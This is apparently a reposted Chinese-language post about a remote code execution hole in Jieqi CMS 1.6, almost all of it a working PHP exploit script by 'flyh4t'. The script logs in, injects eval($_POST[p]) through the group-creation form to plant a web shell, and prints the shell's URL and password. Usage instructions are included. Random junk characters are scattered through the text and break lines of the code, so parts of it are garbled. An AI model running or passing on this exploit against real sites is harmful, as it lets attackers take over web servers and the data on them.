杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
$ k* C* p( M, p7 X7 Z9 s2 w- {. M7 X7 m& O
; @" d) K* u& [% `# w7 v: B; a
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。/ r1 C7 F6 o! p N3 i. V S
需要有一个能创建圈子的用户。8 U; B5 l7 l; H( w9 J0 V B
" l: e# P: i) `7 }+ J
<?php
7 R5 T7 m8 n: w+ A9 k" h9 i
: |, u& G/ \( q2 ~) P8 Kprint_r('. C0 X) X7 u8 S7 B# S8 o. a
+---------------------------------------------------------------------------+/ m2 H2 k- c5 ~- z7 ]- f! K
Jieqi CMS V1.6 PHP Code Injection Exploit' K+ D7 i! x: [! r
by flyh4t
( T2 _! l, B1 F/ wmail: phpsec at hotmail dot com
1 q3 V E9 _! l/ U6 Gteam: http://www.wolvez.org! E U1 {0 w8 h* o, i
+---------------------------------------------------------------------------+
8 U8 Q$ k' J8 r+ S# L'); /**
+ z6 W) `5 R+ r2 K: E( D * works regardless of php.ini settings1 j/ d, E0 S/ f0 _ p
*/ if ($argc < 5) { print_r(') o0 Q; S4 w0 i. ~ h& }5 X2 x
+---------------------------------------------------------------------------+/ Z$ T* c# r1 k# {3 m: [/ g, i
Usage: php '.$argv[0].' host path username; y: z% l( {3 x/ R% _& r6 Z
host: target server (ip/hostname)
$ t" c2 n2 u/ v; H5 ` R# S& T4 Kpath: path to jieqicms
& B! `. q1 m1 {3 o/ D) s% iuasename: a username who can create group
3 d$ Y; c4 g' n( X) S) H: K9 \Example:" l5 S% U# U k7 Y8 L* H# D8 e1 I
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password! o$ B" V7 F7 s: U
+---------------------------------------------------------------------------+
' }' F& X# L) U/ ?'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961- u; V0 J- x! R S
Content-Disposition: form-data; name="gname"6 s5 h5 l; H& u# V
2 w _, D5 E( ?/ b2 f- u'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
) g8 Q: @* y; Q3 B' Y6 s-----------------------------23281168279961( P% P- }# _9 A! y9 D8 V
Content-Disposition: form-data; name="gcatid"
J0 u# N/ K% f 6 F' e/ i2 B4 h$ t* d3 L7 @" t1 @
1: X) L, R+ M! _* g& z! ]
-----------------------------23281168279961, W5 x: N! I) I0 q
Content-Disposition: form-data; name="gaudit"" a; O& r; |9 G7 F
) M& o6 Z$ r' \; J
1
) W( z6 ]% T Z' N* [8 _-----------------------------23281168279961# b& z( t6 E: A! v8 @: c
Content-Disposition: form-data; name="gbrief"
! v6 ~5 u" h: p- P4 @" c
7 f6 H# _5 N5 `! m) T4 W1
" d x6 p& W6 P7 N$ k% Y) t-----------------------------23281168279961--
9 d5 r/ ?/ x+ f1 b'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com+ X3 X9 {2 p* |* d
v, m2 y, }. I/ p* Z/ a/ n8 _# X+ q( wpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |